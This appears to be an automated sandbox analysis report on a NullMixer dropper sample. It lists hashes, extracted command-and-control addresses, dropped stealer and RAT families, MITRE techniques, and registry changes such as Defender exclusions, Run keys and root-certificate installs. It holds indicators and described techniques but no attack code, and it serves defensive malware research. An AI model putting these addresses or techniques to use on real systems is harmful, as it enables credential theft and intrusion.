nullmixer | 799cb4b1d385475c155fae6fc0c214b059f191ed06b9229f287a8d9225ba8a21

Analysis

max time kernel
88s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-10-2024 07:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe
Size

4.4MB
MD5

1c44852292cf03e534ef8c2914b22436
SHA1

39e0966477f02eadd10e35709d52567e9825f533
SHA256

799cb4b1d385475c155fae6fc0c214b059f191ed06b9229f287a8d9225ba8a21
SHA512

7b37e8101bc2f6047f69b3283d6aa2f1344a3641b378f03c8b699fe45df742fde8f608204898e810118e47076374b8d9d51e28df71bdf8e530bd39757a906498
SSDEEP

98304:yUD14snMnUPEEjVhI2DWARNpBJsWqqOog664sGwjf:yUD6snYUM2VFycNDmBGwj

Score

10^/10

nullmixer privateloader redline sectoprat socelars vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

nullmixer

http://znegs.xyz/

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

Build1

45.142.213.135:30058

Signatures

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral1/memory/2872-293-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2872-294-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2872-296-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2872-290-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2872-288-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 5 IoCs

resource	yara_rule
behavioral1/memory/2872-293-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2872-294-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2872-296-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2872-290-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2872-288-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001749c-24.dat	family_socelars
behavioral1/files/0x0005000000019616-118.dat	family_socelars
behavioral1/memory/2920-240-0x0000000000400000-0x0000000000B33000-memory.dmp	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/1200-255-0x0000000000400000-0x0000000002CC9000-memory.dmp	family_vidar
behavioral1/memory/1200-275-0x0000000000400000-0x0000000002CC9000-memory.dmp	family_vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2868	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x00070000000173ee-37.dat	aspack_v212_v242
behavioral1/files/0x000700000001746c-45.dat	aspack_v212_v242
behavioral1/files/0x00080000000173b2-40.dat	aspack_v212_v242

Executes dropped EXE 21 IoCs

pid	Process
2844	setup_installer.exe
2920	setup_install.exe
1272	0fd5c77ed90f39d5.exe
2780	4a448bcddaa0b3.exe
1308	268b3127b936e01.exe
828	28e2ddd2eed6.exe
2224	268b3127b936e0010.exe
1200	4aa1e8b379159.exe
2736	5298ab674.exe
572	21bcc8456d82.exe
484	b28b347be25f8ab8.exe
2420	8e14eeece3767.exe
2232	21bcc8456d82.exe
840	1cr.exe
1552	chrome2.exe
1744	setup.exe
1236	winnetdriv.exe
2772	services64.exe
2872	1cr.exe
1556	BUILD1~1.EXE
2516	sihost64.exe

Loads dropped DLL 59 IoCs

pid	Process
2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe
2844	setup_installer.exe
2844	setup_installer.exe
2844	setup_installer.exe
2844	setup_installer.exe
2844	setup_installer.exe
2844	setup_installer.exe
2920	setup_install.exe
2920	setup_install.exe
2920	setup_install.exe
2920	setup_install.exe
2920	setup_install.exe
2920	setup_install.exe
2920	setup_install.exe
2920	setup_install.exe
2164	cmd.exe
1436	cmd.exe
2436	cmd.exe
1156	cmd.exe
1156	cmd.exe
1956	cmd.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
3064	cmd.exe
828	28e2ddd2eed6.exe
828	28e2ddd2eed6.exe
2788	cmd.exe
2788	cmd.exe
2224	268b3127b936e0010.exe
2224	268b3127b936e0010.exe
1200	4aa1e8b379159.exe
1200	4aa1e8b379159.exe
628	cmd.exe
3056	cmd.exe
2736	5298ab674.exe
2736	5298ab674.exe
3056	cmd.exe
572	21bcc8456d82.exe
572	21bcc8456d82.exe
1484	cmd.exe
572	21bcc8456d82.exe
2232	21bcc8456d82.exe
2232	21bcc8456d82.exe
840	1cr.exe
840	1cr.exe
828	28e2ddd2eed6.exe
828	28e2ddd2eed6.exe
1056	WerFault.exe
1056	WerFault.exe
1056	WerFault.exe
1744	setup.exe
1056	WerFault.exe
1552	chrome2.exe
840	1cr.exe
2872	1cr.exe
2872	1cr.exe
1556	BUILD1~1.EXE
1556	BUILD1~1.EXE
2772	services64.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	8e14eeece3767.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
59	iplogger.org
60	iplogger.org
86	iplogger.org
87	iplogger.org
117	raw.githubusercontent.com
118	raw.githubusercontent.com
27	iplogger.org
29	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.db-ip.com
2	ipinfo.io
5	ipinfo.io
14	api.db-ip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 840 set thread context of 2872	840	1cr.exe	71

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1056	2920	WerFault.exe	32

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	268b3127b936e0010.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winnetdriv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5298ab674.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	28e2ddd2eed6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	21bcc8456d82.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4aa1e8b379159.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	21bcc8456d82.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	268b3127b936e01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BUILD1~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4aa1e8b379159.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4aa1e8b379159.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2560	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8d48fc8adfa6b4a805f1a4a681aaa6f00000000020000000000106600000001000020000000729401475116ace79c4d6c201809380ebcc8330529da1e7a55752e3020bb9fc7000000000e8000000002000020000000c0491fb44df539088ca1bf9c13d84b8279a0b346a41b0613b19a233a1d17c32620000000945a6a159a2f29f6d942ac2623b59bc39c6eb4bbf9183a9a299603b135a2d88d40000000adf05bbdaf8fc212fe6229c1fa48bd90fdcd1a55f5e81187f27da2dc1d1a51248f046144ef90591bd31db6a981453a9d7ccbc93bd3cfe0681094aafbd4944aba	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8d48fc8adfa6b4a805f1a4a681aaa6f000000000200000000001066000000010000200000008ec44dc810461d2e4a0f0ffb2901767908289f4fab2a5d9db31bf20dbd397f61000000000e80000000020000200000003e267b2204289517ea61fe65e5db2cfe82b654cc54c35ec3cca1b7749871f09f9000000029d81750ee29b38fd43b027935ef61d1863d7f24255df7ec20851ff74c1a95c85018e55cbc9488186f78db8d44e678a943afce0b9fa26ea4f5326fdcf3490ebf82da5f652ff8c4d9f34eadebc5ed47962cb501690575c07a0dc6075302bf88ac6d17d96e23163870529e239658f9d664515eb02c10ab82175c83406e52826db3df17720ba1cc9a55eb29974e19f9c18740000000c108da72433d95198ab06413783e35c664c4331d4efa5f76aa49d7347e628670bb81552b4435f5ec3150b9400acd597e4916211543e43b4ca5a1b78ce45a32d6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 800b9d0f8c18db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3A5D97E1-847F-11EF-B954-F2DF7204BD4F} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4aa1e8b379159.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	5298ab674.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	5298ab674.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	4aa1e8b379159.exe
